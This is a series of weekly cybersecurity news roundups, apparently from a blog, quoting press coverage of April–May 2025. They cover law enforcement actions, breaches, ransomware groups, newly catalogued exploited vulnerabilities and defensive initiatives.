    • “On May 7, a range of security researchers observed that LockBit’s Dark Web leak site had been altered. Instead of listing victim organizations, the site now features a simple message: “Don’t do crime CRIME IS BAD xoxo from Prague,” along with a link to a zip archive.
    • “The archive, according to analysis from Qualys yesterday, among others, includes a SQL database file from LockBit’s affiliate panel. Coalition researchers, meanwhile, noted the file includes extensive internal data from the ransomware-as-a-service operation, including nearly 60,000 Bitcoin addresses and more than 4,000 chats with victim organizations from between Dec. 19, 2024, and April 29, 2025.
    • “The file also contains information on more than 70 LockBit administrators and affiliates, researchers noted, including plaintext passwords, as well individual builds and configurations of the LockBit ransomware code. However, the leaked data did not include decryptors or private keys.”

From the cybersecurity defenses front,

  • CISA announced,
    • “The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Environmental Protection Agency (EPA), and Department of Energy (DOE)—hereafter referred to as “the authoring organizations”—are aware of cyber incidents affecting the operational technology (OT) and industrial control systems (ICS) of critical infrastructure entities in the United States. The authoring organizations urge critical infrastructure entities to review and act now to improve their cybersecurity posture against cyber threat activities specifically and intentionally targeting internet connected OT and ICS.”
    • Mitigations and resources are included in the announcement.
  • Bank Info Security lets us know that “Despite the rise of artificial intelligence and automation, human ingenuity remains a critical asset in defending against cyberthreats, said Kara Sprague, CEO at HackerOne.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity and law enforcement front,

  • Cyberscoop reports,
    • “Homeland Security Secretary Kristi Noem outlined her plans Tuesday to refocus the Cybersecurity and Infrastructure Security Agency (CISA) on protecting critical infrastructure from increasingly sophisticated threats — particularly from China — while distancing the agency from what she characterized as mission drift under previous leadership.
    • “Speaking at the 2025 RSAC Conference, Noem provided the most detailed vision yet of how the current administration is pushing CISA to a “back-to-basics” approach aimed at hardening defenses against adversaries who have demonstrated capabilities to infiltrate critical systems.”
  • and
    • “Threat intelligence sharing is flowing between the private sector and federal government and remains unimpeded thus far by job losses and budget cuts across federal agencies that support the cyber mission, according to executives at major security firms.
    • “Top brass at Amazon, CrowdStrike, Google and Palo Alto Networks said there’s been no change to interactions with the federal government since President Donald Trump was inaugurated earlier this year.
    • “Across multiple interviews and media briefings during the RSAC 2025 Conference this week, none of the leaders at these top cybersecurity companies conveyed any concern about or experience with communication breakdowns. Each of them dismissed the idea that collaboration has slowed down amid significant workforce reductions and strategic changes across the federal government.”
  • Earlier this week, the National Institute of Standards and Technology released its FY 2024 Cybersecurity & Privacy Program Annual Report.
  • Federal News Network tells us,
    • “While much of the cybersecurity community’s attention was out west at the annual RSA Conference, the Justice Department announced yet another settlement in its pursuit of contractors who falsely attest to meeting cybersecurity requirements.
    • “DoJ announced today that Raytheon Company, RTX Corporation and Nightwing Group have agreed to pay $8.3 million to settle allegations that Raytheon violated the False Claims Act by falling short of contractually mandated cybersecurity standards.
    • “RTX sold its cybersecurity, intelligence and services business to Nightwing in 2024. DoJ’s case centered on conduct between 2015 and 2021, prior to the acquisition.
    • “The case is another feather in the cap for DoJ’s Civil-Cyber Fraud Initiative. Started under the Biden administration, the goal of the initiative is to enforce cybersecurity requirements that many contractors had been ignoring through the False Claims Act.”
  • Per the Hacker News,
    • “The U.S. Department of Justice (DoJ) on Thursday announced charges against a 36-year-old Yemeni national for allegedly deploying the Black Kingdom ransomware against global targets, including businesses, schools, and hospitals in the United States.
    • “Rami Khaled Ahmed of Sana’a, Yemen, has been charged with one count of conspiracy, one count of intentional damage to a protected computer, and one count of threatening damage to a protected computer. Ahmed is assessed to be currently living in Yemen.
    • “From March 2021 to June 2023, Ahmed and others infected computer networks of several U.S.-based victims, including a medical billing services company in Encino, a ski resort in Oregon, a school district in Pennsylvania, and a health clinic in Wisconsin,” the DoJ said in a statement.”
  • Cyberscoop adds,
    • “Federal authorities extradited a Ukrainian citizen to the United States on Wednesday to face charges for participating in a series of ransomware cyberattacks on organizations based in the U.S. and multiple European countries. 
    • “Artem Stryzhak, 35, was arrested in Spain in June 2024 and was scheduled to appear for arraignment Thursday in the U.S. District Court for the Eastern District of New York. Stryzhak is accused of conspiracy to commit fraud and related activity, including extortion.
    • “Prosecutors accuse Stryzhak and his co-conspirators of using Nefilim ransomware to encrypt computer networks in the U.S., Canada, France, Germany, Australia, the Netherlands, Norway and Switzerland between late 2018 to late 2021.
    • “As alleged, the defendant was part of an international ransomware scheme in which he conspired to target high-revenue companies in the United States, steal data, and hold data hostage in exchange for payment. If victims did not pay, the criminals then leaked the data online,” John Durham, U.S. attorney for the Eastern District of New York, said in a statement.”

From the cybersecurity vulnerabilities and breaches front,

  • Cybersecurity Dive reports,
    • “Hackers are increasingly using AI in their attacks and defenders should follow suit, Check Point Software Technologies said in a report published Wednesday.
    • “The company’s AI security report, announced at the 2025 RSAC Conference in San Francisco, also found that one in 13 generative AI prompts contained potentially sensitive information, and one in every 80 prompts posed “a high risk of sensitive data leakage.”
    • “Unauthorized AI tools, data loss, and AI platform vulnerabilities topped the list of AI risks for enterprises, according to Check Point.”
  • and
    • “In a report published Tuesday, Google said it saw hackers exploit fewer zero-day vulnerabilities in the wild in 2024 than in 2023.
    • “The company attributed the decrease to improvements in secure software development practices.
    • “Still, Google said it is seeing a “slow but steady” increase in the rate of zero-day exploitation over time.”
  • CISA added eight known exploited vulnerabilities to its catalog this week.
  • April 28, 2025
    • CVE-2025-1976 Broadcom Brocade Fabric OS Code Injection Vulnerability
    • CVE-2025-42599 Qualitia Active! Mail Stack-Based Buffer Overflow Vulnerability
    • CVE-2025-3928 Commvault Web Server Unspecified Vulnerability
    • Bleeping Computer discusses these KEVs here.
  • April 29, 2025
    • CVE-2025-31324 SAP NetWeaver Unrestricted File Upload Vulnerability
    • Cybersecurity Dive discusses this KEV here.
  • May 1, 2025
    • CVE-2024-38475 Apache HTTP Server Improper Escaping of Output Vulnerability
    • CVE-2023-44221 SonicWall SMA100 Appliances OS Command Injection Vulnerability
    • Cybersecurity News discusses the Apache KEV here.
    • Bleeping Computer discusses the SonicWall KEV here.
  • May 2, 2025
    • CVE-2025-34028 Commvault Command Center Path Traversal Vulnerability
    • CVE-2024-58136 Yiiframework Yii Improper Protection of Alternate Path Vulnerability
    • Security Affairs discusses these KEVs here.

From the ransomware front,

  • Techradar points out,
    • New research has revealed the scale of recent ransomware revolution, warning it remains a dominant threat to organizations worldwide.
    • Veeam study, which gathered insights from 1,300 CISOs, IT leaders, and security professionals across the Americas, Europe, and Australia, found nearly three-quarters of businesses were impacted by ransomware over the past year.
    • Cybersecurity measures seem to be having some effect, with businesses facing ransomware incidents dropping slightly from 75% to 69% – and ransomware payments are also decreasing, as in 2024, 36% of affected businesses chose not to pay, and 60% of those who did paid less than half of the demanded ransom.
  • Dark Reading adds,
    • “Several high-profile retailers based in the UK have suffered cyberattacks in recent weeks, and all signs point to two possible threat actors being behind the campaign.
    • “The National Cyber Security Centre (NCSC), the UK’s primary cyber agency, said on May 1 that it was tracking a series of attacks impacting retailers. NCSC CEO Dr. Richard Horne said in an included statement that the agency was working with affected organizations and that “these incidents should act as a wake-up call to all organizations.”
    • “Co-Op, Marks & Spencer, and Harrods are among the retailers that have confirmed attacks in recent weeks. In an article published May 2, Bloomberg News reported a spokesperson for the DragonForce ransomware gang — a group that emerged as a ransomware-as-a-service (RaaS) player in 2023 — took credit for the attacks against all three retailers.
    • “Last month, researchers from Sophos’ Secureworks reported that DragonForce had an RaaS model where affiliates could create their own “brand,” using DragonForce’s ransomware or using their own tools for extortion attacks.”
  • and
    • “The notorious Scattered Spider threat group continues to attack high-value targets despite landing on the receiving end of multiple global law enforcement operations.
    • “Scattered Spider gained notoriety in recent years with high-profile breaches and ransomware attacks against large enterprises, including Las Vegas casino and hotel giants Caesars Entertainment and MGM Resorts in 2023. First emerging in 2022, the group’s members displayed a knack for social engineering schemes that allowed them to steal credentials from targeted organizations and gain privileged access into their networks. * * *
    • Bleeping Computer this week reported that the cyberattack against British retail giant Marks & Spencer was perpetrated by members of the group using DragonForce ransomware. Earlier this month, threat intelligence vendor Silent Push said it had observed significant threat activity, specifically phishing campaigns targeting well-known brands this year, from Chick-fil-A to Louis Vuitton.
  • and
    • “RansomHub, an aggressive ransomware-as-a-service (RaaS) operation that gained prominence over the past year in the wake of law enforcement actions against LockBit and ALPHV, appears to have abruptly gone dark earlier this month.
    • “In a new report this week that offers an in-depth look at RansomHub’s affiliate recruitment methods, negotiation tactics, and aggressive extortion strategies, researchers at Group-IB described the operation as inactive since April 1.
    • “Cybercriminals associated with the operation may have migrated to the Russian-language speaking Qilin RaaS operation and are continuing their attacks under that banner, Group-IB said. The security vendor did not offer any explanation for the rapidly growing RansomHub operation’s seemingly sudden and unexpected demise — if that is indeed what it is.”
  • TechTarget offers a “look at the [seven] distinct stages of the ransomware lifecycle to better understand how attackers strike — and how defenders might be better able to resist.”

From the cybersecurity defense front,

  • Cyberscoop reports
    • “Leaders of various federal research agencies and departments outlined a vision Tuesday for the future of critical infrastructure security, emphasizing the promise of combining formal software development methods with large language models (LLMs). 
    • “Acting DARPA Director Rob McHenry told an audience at the RSAC 2025 Conference that such a combination could “virtually eliminate software vulnerabilities” across foundational system infrastructures, a departure from the traditionally accepted risks of software flaws.
    • “We’ve all been trained in a world where we have to accept that there are vulnerabilities in our software, and bad guys exploit those vulnerabilities,” he said. “We try to mitigate the damage and patch them, and we go round on this merry-go-round. That technologically does not need to be true anymore.”
    • “DARPA’s statements came in the context of the AI Cyber Challenge, a public-private collaboration involving industry leaders such as Google, Microsoft, Anthropic and OpenAI. The initiative tests whether advanced AI systems can identify and patch vulnerabilities in open-source software components vital to the electric grid, health care, and transportation.”
  • and
    • “Cryptography experts say the race to fend off future quantum-computer attacks has entered a decisive but measured phase, with companies quietly replacing the internet plumbing that the majority of the industry once considered unbreakable.
    • “Speaking at Cloudflare’s Trust Forward Summit on Wednesday, encryption leaders at IBM Research, Amazon Web Services and Cloudflare outlined how organizations are refitting cryptographic tools that safeguard online banking, medical data and government communications. The aim is to stay ahead of quantum machines that, once powerful enough, could decode the math protecting today’s digital traffic.
    • “Over the next five to 10 years you’re going to see a Cambrian explosion of different cryptographic systems,” said Wesley Evans, a product manager for Cloudflare’s research team, referring to an evolutionary period with a rapid diversification of animal life that occurred roughly 540 million years ago.” 
  • Dark Reading adds,
    • “Each year, top SANS faculty joins the RSAC conference to present what their community of practitioners and researchers see as the most pressing challenges facing the cybersecurity community for the year to come. This year’s list of top-five threats aren’t merely technical, and tackling them will demand coordinated leadership from the very top of the organization and beyond.
    • “The attack techniques outlined in the SANS RSAC 2025 keynote underscore a common theme: Cybersecurity is no longer confined to the security operations center — it’s a leadership issue that impacts every layer of the enterprise,” according to a SANS media statement. “The threats of tomorrow demand a strategic, integrated response rooted in visibility, agility, and cross-functional alignment.”
  • Bleeping Computer notes,
    • “Microsoft has announced that all new Microsoft accounts will be “passwordless by default” to secure them against password attacks such as phishing, brute force, and credential stuffing.
    • “The announcement comes after the company started rolling out updated sign-in and sign-up user experience (UX) flows for web and mobile apps in March, optimized for passwordless and passkey-first authentication.
    • “As part of this simplified UX, we’re changing the default behavior for new accounts. Brand new Microsoft accounts will now be ‘passwordless by default’,” said Joy Chik, Microsoft’s President for Identity & Network Access, and Vasu Jakkal, Corporate Vice President for Microsoft Security.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • Cyberscoop reports,
    • “The Cybersecurity and Infrastructure Security Agency will soon have a new second-in-command.
    • Madhu Gottumukkala has been named deputy director. He comes over to CISA from his prior position in the South Dakota government, where Kristi Noem was most recently governor before taking over as secretary of the Department of Homeland Security. Gottumukkala had been commissioner of the Bureau of Information and Telecommunication (BIT) and state chief information officer.
    • “He’ll leave BIT on May 16. A CISA spokesperson confirmed that Gottumukkala would become deputy director of the agency.”
  • CISA gives us the results of the President’s Cup competition and also announced on April 23,
    • “The [Common Vulnerabilities and Exposures] CVE Program is an invaluable public resource relied upon by network defenders and software developers alike. As the nation’s cyber defense agency, it is a foundational priority for CISA. Recent public reporting inaccurately implied the program was at risk due to a lack of funding. To set the record straight, there was no funding issue, but rather a contract administration issue that was resolved prior to a contract lapse. There has been no interruption to the CVE program and CISA is fully committed to sustaining and improving this critical cyber infrastructure.
    • CISA is proud to be the sponsor for the CVE program, a role we have held for decades. During this time, the CVE Program has gone through many evolutions, and this opportunity is no exception. MITRE, CISA, and the CVE Board have transformed this program into a federated capability with 453 CVE Numbering Authorities (CNAs). This growth has enabled faster and more distributed CVE identification, providing valuable vulnerability information to the public and enabling defenders to take quick action to protect themselves. We have historically been and remain very open to reevaluating the strategy to support the continued efficacy and value of the program.  
    • We also recognize that significant work lies ahead. CISA, in coordination with MITRE and the CVE Board, is committed to actively seeking and incorporating community feedback into our stewardship of the CVE Program. We are committed to fostering inclusivity, active participation, and meaningful collaboration between the private sector and international governments to deliver the requisite stability and innovation to the CVE Program. And we are committed to achieving these goals together.
  • Bleeping Computer tells us,
    • “The FBI has asked the public for information on Chinese Salt Typhoon hackers behind widespread breaches of telecommunications providers in the United States and worldwide.
    • “In October, the FBI and CISA confirmed that the Chinese state hackers had breached multiple telecom providers (including AT&T, Verizon, Lumen, Charter Communications, Consolidated Communications, and Windstream) and many other telecom companies in dozens of countries.
    • “As revealed at the time, while they had access to the U.S. telecoms’ networks, the attackers also accessed the U.S. law enforcement’s wiretapping platform and gained access to the “private communications” of a “limited number” of U.S. government officials.”
  • The HHS Office for Civil Rights announced,
    • “Today [April 25], the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with Comprehensive Neurology, PC (Comprehensive), a small New York neurology practice, concerning a potential violation of the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Security Rule. The settlement resolves an OCR investigation of a [2020] ransomware attack against Comprehensive.” * * *
    • “Under the terms of the settlement, Comprehensive agreed to implement a corrective action plan that will be monitored by OCR for two years and paid $25,000 to OCR.”
    • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/sites/default/files/ocr-hipaa-racap-np.pdf [PDF, 245 KB].”
  • and
    • “Today [April 23], the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with PIH Health, Inc. (PIH), a California health care network, over potential violations of the Health Insurance Portability and Accountability Act of 1996 (HIPAA). The violations stem from a phishing attack that exposed unsecured electronic protected health information (ePHI), prompting concerns related to the Privacy, Security, and Breach Notification Rules under HIPAA.” * * *
    • “The settlement resolves an investigation that OCR conducted after receiving a breach report from PIH in January 2020. The breach report stated that in June 2019, a phishing attack compromised forty-five of its employees’ email accounts, resulting in the breach of 189,763 individuals’ unsecured ePHI. PIH reported that the ePHI disclosed in the phishing attack included affected individuals’ names, addresses, dates of birth, driver’s license numbers, Social Security numbers, diagnoses, lab results, medications, treatment and claims information, and financial information.”
    • “Under the terms of the resolution agreement, PIH has agreed to implement a corrective action plan that will be monitored by OCR for two years and paid a $600,000 settlement to OCR.” * * *
    • The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/hipaa/for-professionals/compliance-enforcement/agreements/index.html.

Three important reports were released this week.

  • Per Cyberscoop,
    • “It looks like 2024 was a record year in cybercrime for all the wrong reasons, according to the FBI’s annual Internet Crime Complaint Center (IC3) report released Wednesday. 
    • “As cyber-enabled fraud and ransomware continue to harm individuals, businesses, and critical infrastructure, the report, now in its 25th year, provides crucial insight into evolving criminal tactics and their nationwide impact. The report is overflowing with key trends, case data, and other statistics from the FBI’s ongoing efforts to combat the cyberthreat landscape.”
  • and
    • “Cybercriminals and state-sponsored threat groups exploited vulnerabilities and initiated ransomware attacks with vigor last year, escalating the scope of their impact by hitting more victims and outmaneuvering defenses with speed.
    • “The rate of ransomware detected in data breaches jumped 37%, occurring in 44% of the 12,195 data breaches reviewed in Verizon’s 2025 Data Breach Investigations Report released Wednesday. Researchers observed the presence of ransomware in 32% of data breaches in last year’s report. 
    • “Verizon’s research underscores the twists and turns of cybercriminal activity and its wide-reaching impact on organizations. “We see less payment activity,” Alex Pinto, associate director of threat intelligence at Verizon Business, told CyberScoop, “but we don’t see it slowing down.”
  • Per Cybersecurity Dive,
    • “Threat actors motivated by financial gain continue to rise in prominence, representing 55% of all cyber actors during 2024, according to a report by Mandiant. The figures show a steady increase from 52% in 2023 and 48% in 2022. 
    • “Exploits remained the most common initial access vector for the fifth consecutive year, representing 33% of exploits overall, according to the Mandiant M-Trends 2025 report. However, stolen credentials became the second most common initial access point for the first time, indicating a rising trend.
    • “Cyber threat groups are increasingly targeting unsecured data repositories as poor security hygiene continues to leave organizations at risk.”

From the cyber vulnerabilities and breaches front,

  • Healthcare Dive reports,
    • “A data breach at Yale New Haven Health has exposed the information of about 5.6 million people, according to a report submitted to federal regulators earlier this month.
    • “The Connecticut-based health system detected unusual activity on its IT systems in early March, Yale New Haven said in a press release. An investigation later found an unauthorized third party had gained access to its network and stole copies of some patient data. 
    • “The incident is the largest healthcare breach reported to federal regulators so far in 2025, according to a portal managed by the HHS’ Office of Civil Rights.”
  • and
    • “A data breach at Blue Shield of California exposed information from 4.7 million people, according to a notice filed with federal regulators earlier this month. 
    • “In February, the insurer learned that Google Analytics, a vendor Blue Shield employs to track use of its websites, was sharing member data with the advertising service Google Ads from April 2021 through January 2024, according to a breach notice. 
    • “Blue Shield can’t confirm whether any particular beneficiary’s information is affected due to “the complexity and scope of the disclosures,” so the insurer is notifying all members who could have accessed their information on affected websites during the nearly three-year period.” 
  • Cybersecurity Dive tells us,
    • “Conduent Inc. warned in an April 14 regulatory filing with the Securities and Exchange Commission that a “significant” number of people had their personal data stolen in a January cyberattack that affected a limited number of the company’s clients.
    • “The company, a major government payments technology vendor for social services and transit systems, was targeted in a Jan. 13 attack that disrupted certain operations. 
    • “The company warned it has incurred and accrued a material amount of nonrecurring expenses related to the breach. A spokesperson for the company did not have specific numbers yet, but a breach notification has already been posted by the California Attorney General’s office.”
  • and
    • Threat groups from across the globe are increasingly weaponizing older vulnerabilities for exploitation, according to a report released Wednesday by GreyNoise Intelligence.
    • More than half of these resurgent vulnerabilities affect edge technologies, the report shows. Nearly seven out of 10 of the most unpredictable vulnerabilities — known as Black Swan vulnerabilities — affect edge technologies.
    • Almost 40% of Black Swan vulnerabilities specifically affect VPNs and routers, according to the report.
  • Per Cyberscoop,
    • “Attackers exploited nearly a third of vulnerabilities within a day of CVE disclosure in the first quarter of 2025, VulnCheck said in a report released Thursday. The company, which focuses on vulnerability threat intelligence, identified 159 actively exploited vulnerabilities from 50 sources during the quarter.
    • “The time from CVE disclosure to evidence of exploitation in the first quarter was marginally faster than what VulnCheck observed during 2024, Patrick Garrity, security researcher at the company, said in the report. “This demonstrates the need for defenders to move fast on emerging threats while continuing to burn down their vulnerability debt,” Garrity wrote. 
    • “VulnCheck’s research reinforces multiple recent reports that warned about increased exploits in 2024. Mandiant said exploits were the most common initial infection vector last year, representing 1 of every 3 attacks. Verizon reported a 34% increase in exploited vulnerabilities, and IBM X-Force said exploitation of public-facing applications accounted for 30% of incident response cases last year.”
  • and
    • “Attackers are having a field day with software defects in security devices, according to a new report released Wednesday by Mandiant. 
    • “Exploits were the most common initial infection vector, representing 1 of every 3 attacks in 2024, and the four most frequently exploited vulnerabilities were all contained in edge devices, such as VPNs, firewalls and routers, Mandiant said in its M-Trends report released Wednesday.
    • “Exploitation of these vulnerabilities represented slightly less than half of all observed vulnerability exploitation,” said Kirstie Failey, principal threat analyst at Google Threat Intelligence Group, under which the Mandiant brand operates.
    • “Threat researchers and federal cyber authorities have been sounding the alarm about attacks targeting network edge devices for more than a year. Since 2024, security device exploits have resulted in attacks on government agencies and some of the most valuable publicly-traded companies in the world.”
  • Per Cybersecurity Dive,
    • “Security researchers warn that hackers are actively exploiting a critical unrestricted-file-upload vulnerability in SAP NetWeaver Visual Composer. 
    • “The vulnerability, tracked as CVE-2025-31324, could allow an unauthenticated user to upload malicious executable binaries. The vulnerability has a severity score of 10.  
    • “Researchers from Reliaquest disclosed the vulnerability to SAP after an investigation uncovered attackers uploading JSP webshells into publicly accessible directories.” 
  • FEHBlog note: CISA did not add a known exploited vulnerability to its catalog this week.

From the ransomware front,

  • Palo Alto Networks issued a report on extortion and ransomware trends in the first quarter of 2025.
  • Dark Reading reports,
    • “The ransomware-as-a-service model is perpetually troubling for dropping the barrier to entry for aspiring ransomware actors, and two threat actors are innovating in the space with additional affiliate models.
    • “Extended detection and response vendor Secureworks (owned by Sophos) published research today detailing expanded affiliate models belonging to ransomware-as-a-service (RaaS) gangs DragonForce and Anubis.
    • “As a model, ransomware-as-a-service (RaaS) has gained significant popularity in recent years. A threat actor typically sells or leases many of the tools a less experienced cybercriminal (or affiliate) would need to conduct a ransomware attack; the affiliate typically shares the proceeds from subsequent attacks with the operator.
    • “The RaaS model has significantly lowered the technical barriers for wannabe cybercriminals, and as such it has become a serious problem for organizations around the world.”
  • Infosecurity Magazine notes,
    • “A new ransomware strain known as ELENOR-corp, identified as version 7.5 of the Mimic ransomware, has been used in a series of targeted attacks on the healthcare sector.
    • “The campaign displays a range of advanced capabilities, including data exfiltration, persistent access and anti-forensic strategies designed to cripple recovery efforts and maximize damage.”

From the cybersecurity defenses front,

  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity renewals, policy and law enforcement front,

  • Federal News Network reported on Tuesday,
    • “The Cybersecurity and Infrastructure Security Agency [CISA] has inked a last-minute funding extension for a key cyber vulnerability management program.
    • CISA’s contract with MITRE to manage the Common Vulnerabilities and Exposures, or CVE, program was set to expire on Wednesday. But after an outcry from the cybersecurity community, CISA executed an 11-month option period for MITRE’s contract on Tuesday night.
    • “The CVE program is invaluable to the cyber community and a priority of CISA,” a CISA spokesperson said on Wednesday. “Last night, CISA executed the option period on the contract to ensure there will be no lapse in critical CVE services. We appreciate our partners’ and stakeholders’ patience.”
    • The CVE program is a public database of known security vulnerabilities in software and hardware. It’s relied on by organizations across the world to manage cyber vulnerabilities in products and services. CISA’s “Known Exploited Vulnerabilities” database, for instance, relies on CVEs to prioritize how quickly federal agencies must patch bugs on the list.
  • Cybersecurity Dive adds,
    • “Two federal lawmakers today introduced a bipartisan bill that preserves key regulation that facilitates the sharing of cyber-threat data between private companies and the federal government. 
    • “The Cybersecurity Information Sharing Extension Act, introduced by U.S. Sens. Gary Peters (D-MI) and Mike Rounds (R-SD), would extend provisions of the Cybersecurity Information Sharing Act of 2015, which is due to expire in September. The law encourages businesses to share information about ongoing cybersecurity threats with the federal government and is one of few legislative actions that has actually had an impact on real-world cybersecurity, security experts said.
    • “Specifically, the Cybersecurity Information Sharing Act of 2015 gives incentives to companies to voluntarily share cybersecurity threat indicators, such as software vulnerabilities, malware or malicious IP addresses, with the Department of Homeland Security (DHS). It does this by providing legal protections for companies that do so by providing federal antitrust exemptions and precluding them from being held accountable for state and federal disclosure laws.”
  • CISA announced,
    • “Cyber threats across the globe have put into focus our country’s need for cyber talent. CISA leads and hosts the President’s Cup Cybersecurity Competition to identify, recognize, and reward the best cyber talent across the federal workforce. Participants are challenged to outthink and outwit their competitors in a series of tests designed to expand cyber skills that are based on real-world situations.  For President’s Cup 6, participants will compete in a maximum velocity metaverse full of mayhem and taking place in a world light years ahead of our own.  
    • “Want to see what it’s like to participate in the President’s Cup? Federal employees can visit the President’s Cup Practice Area to take on challenges from previous competitions and receive a certificate of completion. Anyone can visit the President’s Cup GitHub page to find descriptions, solution guides, virtual machine builds and other artifacts from challenges featured in previous President’s Cup competitions.”
  • The National Institute of Standards and Technology (NIST) let us know,
    • “A draft update to the NIST Privacy Framework will enable organizations to use it seamlessly with the agency’s Cybersecurity Framework, which received its own update last year. 
    • “Targeted changes to content and structure respond to stakeholder needs and make the document easier to use.”
    • “NIST is accepting public comments on the draft via privacyframework@nist.gov until June 13, 2025. A template for submitting comments can be found at the NIST Privacy Framework website. Following the comment period, NIST will consider additional changes and release a final version later this calendar year.”
  • The HHS Office for Civil Rights announced on April 17,
    • “Today, the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with Guam Memorial Hospital Authority (GMHA), a public hospital on the U.S. Territory, island of Guam, concerning a potential violation of the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Security Rule, following the receipt of two complaints alleging that the electronic protected health information (ePHI) of GMHA patients was impermissibly disclosed.” * * *
    • “Ransomware and hacking are the primary cyber-threats to electronic protected health information within the health care industry. Failure to conduct a HIPAA risk analysis puts this information at risk and vulnerable to future ransomware attacks and other cyber-threats,” said OCR Acting Director Anthony Archeval.
    • “Under the terms of the resolution agreement, GMHA agreed to implement a corrective action plan that will be monitored by OCR for three years, and paid OCR $25,000.” * * *
    • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/sites/default/files/ocr-hipaa-recap-gmha.pdf [PDF, 228 KB].”
  • Per Bleeping Computer,
    • “The FBI warns that scammers impersonating FBI Internet Crime Complaint Center (IC3) employees offer to “help” fraud victims recover money lost to other scammers.
    • “Over the last two years, between December 2023 and February 2025, the FBI said it has received over 100 reports of fraudsters using this tactic.
    • “Complainants report initial contact from the scammers can vary. Some individuals received an email or a phone call, while others were approached via social media or forums,” the law enforcement agency warned in a Friday public service announcement.”

From the cybersecurity vulnerabilities and breaches front,

  • Cyberscoop reports,
    • “A House panel has concluded that the U.S. government should double down on export controls and other tools to slow down the progress of Chinese AI companies like DeepSeek, while also preparing for a future where those efforts fail.
    • “In a report released Wednesday, the House Select Committee on the Chinese Communist Party further fleshes out the financial and technological resources that went into building DeepSeek’s R1 reasoning model, as well as its potential risks to U.S. economic and national security.
    • “The authors conclude that the DeepSeek website and app “acts as a direct channel for foreign intelligence gathering on Americans’ private data.”
  • Dark Reading adds,
    • “One of China’s major state-funded espionage groups has created or otherwise upgraded various malware programs, signaling a notable arsenal refresh that defenders need to be aware of.
    • “Mustang Panda (aka Bronze President, Stately Taurus, and TA416) is an advanced persistent threat (APT) believed to be sponsored by the People’s Republic of China (PRC). It has long been known for spying on targets of interest to the PRC, including: military and government organizations, nongovernmental organizations (NGOs), think tanks, minority groups, and corporations in major industries, primarily around East and Southeast Asia but also in the West.
    • “Recently, the group attacked an organization based in Myanmar. In the process, researchers from Zscaler uncovered four previously unknown attack tools the group is now using. They include two keyloggers, a tool for facilitating lateral movement, and a driver used to evade endpoint detection and response (EDR) software. Besides that, the group has also upgraded its signature backdoor, “Toneshell.””
  • Per Cybersecurity Dive,
    • “Lemonade Inc. has begun sending notification letters to about 190,000 people after their driver’s license numbers were transmitted unencrypted, according to regulatory filings by the company. 
    • “The company said a technical issue in its online application process for car insurance led to the exposure of data in an application programming interface call to a third-party data provider, according to an April 9 filing with the Securities and Exchange Commission.
    • “As part of the online application process, certain information is sent between a server and a user’s browser, according to the filing. This includes data used to generate an insurance quote.  
    • “Lemonade said it learned of the issue on March 14 and said the exposures likely lasted from April 2023 through March 2024, according to a notice filed with the California Attorney General’s office.”
  • and
    • “Hertz Corp. confirmed a threat actor gained access to sensitive personal data in a breach linked to vulnerabilities in Cleo file-transfer software, according to a filing Friday with the Maine Attorney General’s office. 
    • “Hertz said it learned on Feb. 10 that an unauthorized third party obtained the data in connection with an attack spree that took place between October and December 2024. Hertz completed an analysis of the stolen data on April 2. 
    • “Importantly, to date, our investigation has found no evidence that Hertz’s own network was affected by this event,” a Hertz spokesperson said via email. 
  • CISA added four known exploited vulnerabilities to its catalog this week.
  • April 16, 2025
    • CVE-2021-20035 SonicWall SMA100 Appliances OS Command Injection Vulnerability
      • Cybersecurity Dive discusses this KEV here.
  • April 17, 2025
    • CVE-2025-31200 Apple Multiple Products Memory Corruption Vulnerability
    • CVE-2025-31201 Apple Multiple Products Arbitrary Read and Write Vulnerability
    • CVE-2025-24054 Microsoft Windows NTLM Hash Disclosure Spoofing Vulnerability
      • Dark Reading discusses the Apple KEVs here.
      • Hacker News discusses the Microsoft KEV here.
  • Cybersecurity Dive adds,
    • “Huntress on Monday published research that showed exploitation of CVE-2025-30406, a deserialization vulnerability in Gladinet’s CentreStack enterprise file-sharing platform for managed service providers (MSPs). The cybersecurity vendor said seven organizations were compromised via the zero-day flaw, which involves a hardcoded cryptographic key that can be used to gain remote code execution.
    • “Huntress warned that Gladinet’s Triofox product also relies on a hardcoded key and is vulnerable to CVE-2025-30406. Triofox is an on-premises file-sharing server designed for larger enterprises, according to Gladinet.
    • CISA added CVE-2025-30406 to its known exploited vulnerabilities catalog on April 9. Gladinet first disclosed the flaw on April 3 and warned that exploitation had already been observed in the wild.”

From the ransomware front,

  • Cybersecurity Dive reports,
    • “DaVita has been hit by a ransomware attack that’s affecting operations, the kidney care provider said Monday. 
    • “The dialysis company discovered the attack, which encrypted parts of its network, on Saturday, according to a securities filing. Davita then activated its response plans and isolated affected systems.
    • “The company did not disclose how its operations are being affected or how long the disruption will last, but said patient care is continuing.” 
  • and
    • “Ahold Delhaize confirmed Thursday that certain files from its U.S. operations were stolen in a November cyberattack after a threat group claimed credit for the incident.
    • “The threat group, tracked as Inc Ransom, claimed in a Wednesday post on its leak site to have up to 6 TB of sensitive data from the Netherlands-based supermarket operator’s U.S. division and threatened to release the information if its demands are not met, according to researchers at Arctic Wolf. The attackers have not said what those demands are.
    • “Since the incident was detected, our teams have been working diligently to determine what information may have been affected,” Ahold Delhaize USA said in a statement.”
  • Per Security Week,
    • “The Oregon Department of Environmental Quality (DEQ) is the regulatory agency in charge of the quality of air, land and water in the state. The organization revealed on April 9 that it had launched an investigation into a cyberattack that forced it to shut down networks as part of containment efforts.
    • “The DEQ has been issuing updates every day since, and several of the updates pointed out that the agency had found no evidence of a data breach. 
    • “The incident disrupted email and help desk services, as well as vehicle inspection stations. The agency said its environmental data management system is hosted on a separate server and has not been impacted.
